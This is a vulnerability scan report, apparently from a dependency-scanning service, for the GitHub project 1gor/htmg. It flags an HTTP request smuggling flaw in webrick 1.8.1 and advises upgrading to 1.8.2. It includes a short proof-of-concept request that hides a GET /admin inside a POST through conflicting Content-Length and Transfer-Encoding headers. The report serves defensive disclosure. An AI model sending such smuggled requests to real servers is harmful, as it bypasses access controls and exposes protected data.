Skip to main content

Test Results

1gor/htmg

Vulnerabilities

 1 via 1 paths

Dependencies

 9

Source

 GitHub

Commit

 45dc60f2

Find, fix and prevent vulnerabilities in your code.

Test and protect my applications
Severity
  • 1
Status
  • 1
  • 0
  • 0

medium severity

HTTP Request Smuggling

  • Vulnerable module: webrick
  • Introduced through: webrick@1.8.1

Detailed paths

  • Introduced through: 1gor/htmg@1gor/htmg#45dc60f27383b663d4150b4bf322333cb4c4755f webrick@1.8.1
    Remediation: Upgrade to webrick@1.8.2.

Overview

webrick is a HTTP server toolkit that can be configured as an HTTPS server, a proxy server, and a virtual-host server.

Affected versions of this package are vulnerable to HTTP Request Smuggling when httprequest.rb processes a request with both Content-Length and Transfer-Encoding headers. An attacker can send a GET /admin inside a POST /user to trick the server into treating the second one as a legitimate request, exposing unintended data.

Note: The package maintainers instruct users not to use this package in production and that it is no longer part of the Ruby language although it was in the past.

PoC

POST /user HTTP/1.1
Host: 127.0.0.1:8000
Content-Length: 50
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Host: 127.0.0.1:8000

Remediation

Upgrade webrick to version 1.8.2 or higher.

References

HTTP Request Smuggling vulnerability report